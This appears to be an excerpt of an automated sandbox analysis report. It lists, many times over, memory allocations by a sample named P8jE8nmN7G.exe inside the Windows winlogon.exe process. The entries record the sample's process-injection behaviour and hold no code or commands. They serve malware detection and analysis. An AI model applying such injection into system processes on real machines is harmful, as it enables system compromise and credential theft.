Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE39000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE3B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE59000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE5B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE79000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE7B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE99000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE9B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEBB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEDB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEFB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF19000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF1B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF39000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF3B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF59000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF5B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF79000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF7B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF99000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF9B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFB9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFBB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFC1000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFD6000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFD9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFDB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFE1000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFF6000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFF9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: CFFB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D000000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D000000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D001000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D016000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D019000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D01B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D020000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D020000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D021000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D036000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D039000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D03B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D040000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D040000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D041000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D056000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D059000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D05B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D060000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D060000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D061000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D076000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D079000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D07B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D080000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D080000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D081000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D096000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D099000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D09B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0A1000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0B6000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0B9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0BB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0C1000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0D6000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0D9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0DB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0E1000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0F6000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0F9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D0FB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D100000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D100000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D101000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D116000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D119000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D11B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D120000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D120000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D121000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D136000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D139000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D13B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D140000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D140000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D141000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D156000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D159000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D15B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D160000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D160000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D161000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D176000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D179000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D17B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D180000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D180000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D181000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D196000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D199000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D19B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1A1000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1B6000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1B9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1BB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1C1000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1D6000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1D9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1DB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1E1000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1F6000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1F9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D1FB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D200000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D200000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D201000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D216000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D219000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D21B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D220000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D220000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D221000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D236000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D239000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D23B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D240000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D240000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D241000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D256000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D259000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D25B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D260000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D260000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D261000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D276000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D279000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D27B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D280000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D280000 protect: page read and write
